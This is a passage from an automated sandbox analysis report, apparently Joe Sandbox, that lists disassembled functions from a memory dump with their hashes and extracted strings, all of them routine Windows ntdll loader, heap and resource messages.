                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                                                                                                                      • API String ID: 0-1145731471
                                                                                                                                      • Opcode ID: 933dae2bf1227b1bf087441c4baa3790fc9235fe606611063b6a62406eb385bf
                                                                                                                                      • Instruction ID: 5218056fb79e5b2aea77b5720509a39a07be81d82e54544d563cc274d8588ee1
                                                                                                                                      • Opcode Fuzzy Hash: 933dae2bf1227b1bf087441c4baa3790fc9235fe606611063b6a62406eb385bf
                                                                                                                                      • Instruction Fuzzy Hash: 29B17779A11B068FEB18CF65C890BAEB7B6EF44794F508429E851EB790D770E880CB04
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: FilterFullPath$UseFilter$\??\
                                                                                                                                      • API String ID: 0-2779062949
                                                                                                                                      • Opcode ID: 139cb9efb787d12781c125bec447edb5eba035cffc92a1b10eb0536e80c5aa97
                                                                                                                                      • Instruction ID: 59c308203e746248cc080755b1a5d824b2135d4f1bf6914a4ecc6103ea23e2d9
                                                                                                                                      • Opcode Fuzzy Hash: 139cb9efb787d12781c125bec447edb5eba035cffc92a1b10eb0536e80c5aa97
                                                                                                                                      • Instruction Fuzzy Hash: B4A162B69116299FDB21DF28CC88B99B7B8EF08750F1041E9E909B7250D7359EC5CF50
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: Objects=%4u$Objects>%4u$VirtualAlloc
                                                                                                                                      • API String ID: 0-3870751728
                                                                                                                                      • Opcode ID: 8e6ba49458d7632ec835e7b0950106c68f6ca97a2e3345058d11b2bd9e86e23e
                                                                                                                                      • Instruction ID: f79c1453a6883cfc342979a3f5bfc6650739c485570899a3c7e8c2edc249fbfa
                                                                                                                                      • Opcode Fuzzy Hash: 8e6ba49458d7632ec835e7b0950106c68f6ca97a2e3345058d11b2bd9e86e23e
                                                                                                                                      • Instruction Fuzzy Hash: B1911DB4E00605DFEB14CF59D880B9DB7B1BF88318F14816AE905BB355EB799881CF54
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      • HEAP: , xrefs: 3423E442
                                                                                                                                      • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 3423E455
                                                                                                                                      • HEAP[%wZ]: , xrefs: 3423E435
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                                                                                                      • API String ID: 0-1340214556
                                                                                                                                      • Opcode ID: 7ae1b1fa05053bd54f41ddf051792f66623e743c2342a579bdac309311dbd019
                                                                                                                                      • Instruction ID: 78e6009329fde0220f797fc53bab68179cd1a15dee7263b0b722d8354658e9f2
                                                                                                                                      • Opcode Fuzzy Hash: 7ae1b1fa05053bd54f41ddf051792f66623e743c2342a579bdac309311dbd019
                                                                                                                                      • Instruction Fuzzy Hash: F95112B5701B84EFE701CBA8C8D4BAABBF8EF05344F0441A9E5459B692D734EA05CB51
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      • minkernel\ntdll\ldrmap.c, xrefs: 3424A3A7
                                                                                                                                      • Could not validate the crypto signature for DLL %wZ, xrefs: 3424A396
                                                                                                                                      • LdrpCompleteMapModule, xrefs: 3424A39D
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                                                                                      • API String ID: 0-1676968949
                                                                                                                                      • Opcode ID: a452c250b9ba814690aacff30e19e25f346dbea1c089e3e8b9a43c65dbb18361
                                                                                                                                      • Instruction ID: 5cfb6f48c3f9b71cb0957343e005a3f7a8e408de420081a42e6a581c061aad7b
                                                                                                                                      • Opcode Fuzzy Hash: a452c250b9ba814690aacff30e19e25f346dbea1c089e3e8b9a43c65dbb18361
                                                                                                                                      • Instruction Fuzzy Hash: 3B51E178A00B46DFF725CA58C985B29BBE5EF00794F114298E952BF6D1EB75E900CF40
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      • HEAP: , xrefs: 3428D79F
                                                                                                                                      • HEAP[%wZ]: , xrefs: 3428D792
                                                                                                                                      • Heap block at %p modified at %p past requested size of %Ix, xrefs: 3428D7B2
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                                                                                                      • API String ID: 0-3815128232
                                                                                                                                      • Opcode ID: 489a4ebb9b3e448ed52e1aa5c4306434f5caff2318536f193b8038ee2c5f4f72
                                                                                                                                      • Instruction ID: a528d65bd6f018ac631213d88e48caeada553d1d2bfb8f852c107e2206572d6d
                                                                                                                                      • Opcode Fuzzy Hash: 489a4ebb9b3e448ed52e1aa5c4306434f5caff2318536f193b8038ee2c5f4f72
                                                                                                                                      • Instruction Fuzzy Hash: 2151377A2307A5CFF350CA29C84477A73E6DF45284F9048CDE4D6AB2C5D626D84BDB20
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                                                                                                                      • API String ID: 0-1151232445
                                                                                                                                      • Opcode ID: 4575353f65b6c5c1dbc60b3b67cf947a73d840378577b00f04c06ea28e48f00f
                                                                                                                                      • Instruction ID: bb206de18140715b759512e29e54d0321a4da15e0c9319bca409873046d3c95f
                                                                                                                                      • Opcode Fuzzy Hash: 4575353f65b6c5c1dbc60b3b67cf947a73d840378577b00f04c06ea28e48f00f
                                                                                                                                      • Instruction Fuzzy Hash: AC4152FA201B858FFB14CE18C8C0BB677A4DF06344F6544BDD4969B656DBA0E846CB21
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 34251943
                                                                                                                                      • minkernel\ntdll\ldrtls.c, xrefs: 34251954
                                                                                                                                      • LdrpAllocateTls, xrefs: 3425194A
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                                                                                                                      • API String ID: 0-4274184382
                                                                                                                                      • Opcode ID: c122fe2c5dcf538bb55cffbf407c70b162732bc2cc0c4dc4b9354a736c76a250
                                                                                                                                      • Instruction ID: 669b48d4f2e45afe8a55de932b868e4e39b00a01450f6ec863e96430490c6885
                                                                                                                                      • Opcode Fuzzy Hash: c122fe2c5dcf538bb55cffbf407c70b162732bc2cc0c4dc4b9354a736c76a250
                                                                                                                                      • Instruction Fuzzy Hash: 0F4159B9E00A09EFEB14CFA9C885AADBBF6FF48340F048159E405B7251DB35A841CF94
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      • LdrpInitializeTls, xrefs: 34251851
                                                                                                                                      • DLL "%wZ" has TLS information at %p, xrefs: 3425184A
                                                                                                                                      • minkernel\ntdll\ldrtls.c, xrefs: 3425185B
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                                                                                                      • API String ID: 0-931879808
                                                                                                                                      • Opcode ID: 55f70b8164f448dd0fd70080c5cb5893d6f7274721f4498c10067a5d27a1c82a
                                                                                                                                      • Instruction ID: 735c965188980f4bb4c0234aa21d6dae2c3f70e7a177f3e70db5ea4bfce9673a
                                                                                                                                      • Opcode Fuzzy Hash: 55f70b8164f448dd0fd70080c5cb5893d6f7274721f4498c10067a5d27a1c82a
                                                                                                                                      • Instruction Fuzzy Hash: 9831CF71E10605BFF7208B59CC89B6A7AE9EF49795F010169E403B7190EBB0AD85CBA4
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 342685DE
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                                                                      • API String ID: 0-702105204
                                                                                                                                      • Opcode ID: 15a372a79608ccf6ebb1e1bf3e56590a967410474e14875202ca7144e10cb013
                                                                                                                                      • Instruction ID: 4bb68b8c6455a25cb1f89ccd328e052bebdeeec2925351549a8ef6f4f2b467ff
                                                                                                                                      • Opcode Fuzzy Hash: 15a372a79608ccf6ebb1e1bf3e56590a967410474e14875202ca7144e10cb013
                                                                                                                                      • Instruction Fuzzy Hash: CB012B75A01701DFE7204E15D8CCB667B66EF46298F40085CED4337452CFE4A8C5CE95
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: @$@
                                                                                                                                      • API String ID: 0-149943524
                                                                                                                                      • Opcode ID: b86202902b68377f4360f441e6e6d1caa3eb24d3e5ca4a85492b3941a5a895ce
                                                                                                                                      • Instruction ID: d1638510e6589f833ac736b149e0f2c84f28c03df3761fe169368a2181160049
                                                                                                                                      • Opcode Fuzzy Hash: b86202902b68377f4360f441e6e6d1caa3eb24d3e5ca4a85492b3941a5a895ce
                                                                                                                                      • Instruction Fuzzy Hash: 6932D0B4608B128FD754CF14C8C0B2EB7E5EF88744F414A5EF8859B2A5E736D846CB92
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3446177414-0
                                                                                                                                      • Opcode ID: 86f2c8b4c45ee47cda23bb0f48dce994ce3cf82625c03ca6216eff853c70cfd5
                                                                                                                                      • Instruction ID: 07cdf774333c58927e4d043cbf945efbe430b531ad5649539c1b02aa4daee0bb
                                                                                                                                      • Opcode Fuzzy Hash: 86f2c8b4c45ee47cda23bb0f48dce994ce3cf82625c03ca6216eff853c70cfd5
                                                                                                                                      • Instruction Fuzzy Hash: D731B039701F02EFE7869FA4C980A9AFBAAFF48794F404155E90167A50DB70E861CFD0
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3446177414-0
                                                                                                                                      • Opcode ID: df5ba2de8c7552895c6724fde2dec80deece04071eb7e235ccf280d5a3b66216
                                                                                                                                      • Instruction ID: 9293f61813eae2dc5b04d51ed5862f89d6e05cd83d4446a4041f79f39274b334
                                                                                                                                      • Opcode Fuzzy Hash: df5ba2de8c7552895c6724fde2dec80deece04071eb7e235ccf280d5a3b66216
                                                                                                                                      • Instruction Fuzzy Hash: 8B11C871F14656AFEB058B5DC988B5EFAAEEB883A4F110169E406F3300DEB49D41CF94
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: @$AddD
                                                                                                                                      • API String ID: 0-2525844869
                                                                                                                                      • Opcode ID: 910e8c524f5031079560cd247d7e2f8e2f543aadfc4521643dc1d1acc0977c9d
                                                                                                                                      • Instruction ID: 89795887ea5d4ef6422ca219d93b11c044d5e43181497ee620f405addb3f536f
                                                                                                                                      • Opcode Fuzzy Hash: 910e8c524f5031079560cd247d7e2f8e2f543aadfc4521643dc1d1acc0977c9d
                                                                                                                                      • Instruction Fuzzy Hash: F5A1ACB6504344AFE315CF10C844BABB7E9FF84708F504B2EF98596294E7B4E945CBA2
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      • RedirectedKey, xrefs: 342BB60E
                                                                                                                                      • \Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\, xrefs: 342BB5C4
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: RedirectedKey$\Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\
                                                                                                                                      • API String ID: 0-1388552009
                                                                                                                                      • Opcode ID: 37249e58cc090e585b733a6415f97235f2b6519ef46aab00f1cc77cf0dbfbffb
                                                                                                                                      • Instruction ID: 6b9813b4d9797da4b61005d19d997a3dbfe32791d12c577b6d652b2a477c322f
                                                                                                                                      • Opcode Fuzzy Hash: 37249e58cc090e585b733a6415f97235f2b6519ef46aab00f1cc77cf0dbfbffb
                                                                                                                                      • Instruction Fuzzy Hash: 9561F0B6C00619ABDF11CF95C988ADEBFB9FB08740F50406AE815B7250DB748A46DBA0
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                      • String ID: $$$
                                                                                                                                      • API String ID: 3446177414-233714265
                                                                                                                                      • Opcode ID: ca4da6ee75fc5eb0ae64cf8882c4b4b36dbc1bef605ee3ccdb3885aff4d5199c
                                                                                                                                      • Instruction ID: 8229eaae83e4766fb129ecc5aedd4cc27d02029e4f7d726bf9db71a8dcd98275
                                                                                                                                      • Opcode Fuzzy Hash: ca4da6ee75fc5eb0ae64cf8882c4b4b36dbc1bef605ee3ccdb3885aff4d5199c
                                                                                                                                      • Instruction Fuzzy Hash: AF61C0B5A00F49CFEB20CF64C9C4B9DB7B2FF44704F40426AD5156B690CBB6A982CB90
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      • RtlpResUltimateFallbackInfo Enter, xrefs: 341EA21B
                                                                                                                                      • RtlpResUltimateFallbackInfo Exit, xrefs: 341EA229
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                                                      • API String ID: 0-2876891731
                                                                                                                                      • Opcode ID: 5fae79da7accc33bacd180ca0cc196ad0af82eea96633a0a610e7196c4a97b1e
                                                                                                                                      • Instruction ID: d99e7cc513ebe4d67a3d4424309eafbbd32c88c41248450c3db457f2da6aaa86
                                                                                                                                      • Opcode Fuzzy Hash: 5fae79da7accc33bacd180ca0cc196ad0af82eea96633a0a610e7196c4a97b1e
                                                                                                                                      • Instruction Fuzzy Hash: CC418E79700F46DBEB09CF9AD880B6A77B4EF45784F2140A9E804EB391E736D981CB14
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                                                                                                                      • API String ID: 0-118005554
                                                                                                                                      • Opcode ID: 5b17bc7c6c339d61657d4f42e75675a294091c13b3962d107eee4e65c5146a73
                                                                                                                                      • Instruction ID: 694fa38ec823191b86900bcc63160fc066b9f4586a8f6cd1d65ef15bd5a83239
                                                                                                                                      • Opcode Fuzzy Hash: 5b17bc7c6c339d61657d4f42e75675a294091c13b3962d107eee4e65c5146a73
                                                                                                                                      • Instruction Fuzzy Hash: EE31FE75218782DFE301CB68D880F1ABBE8EF85754F01086EF9549B382EB71D905CB52
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: .Local\$@
                                                                                                                                      • API String ID: 0-380025441
                                                                                                                                      • Opcode ID: 11c5f5eb3f0cda592f187de4163975712cfa87d77ef8f92dc7765fadb2221079
                                                                                                                                      • Instruction ID: 214ee73dc27fa7d876ca3d3ce0e65d014a70497fb7cbd09e23c996065044f88b
                                                                                                                                      • Opcode Fuzzy Hash: 11c5f5eb3f0cda592f187de4163975712cfa87d77ef8f92dc7765fadb2221079
                                                                                                                                      • Instruction Fuzzy Hash: 783190B1508705EFE350DF28C880E5BBBEAEB85694F40092EF994A3250DA35DD09CB92
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                      • String ID: Cleanup Group$Threadpool!
                                                                                                                                      • API String ID: 2994545307-4008356553
                                                                                                                                      • Opcode ID: e6623b7d17381b2ca5587108ee7db649830da4cdeee9f4f9d7137957d45b86f3
                                                                                                                                      • Instruction ID: 9fae2f22c3318fb12dad8473aa8ca8866d59d139de5818da4e45cfaba58291f4
                                                                                                                                      • Opcode Fuzzy Hash: e6623b7d17381b2ca5587108ee7db649830da4cdeee9f4f9d7137957d45b86f3
                                                                                                                                      • Instruction Fuzzy Hash: 260121B2918700AFE311DF18CD05B1277E8E740719F018939E65DE79A0E734E900CB85
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
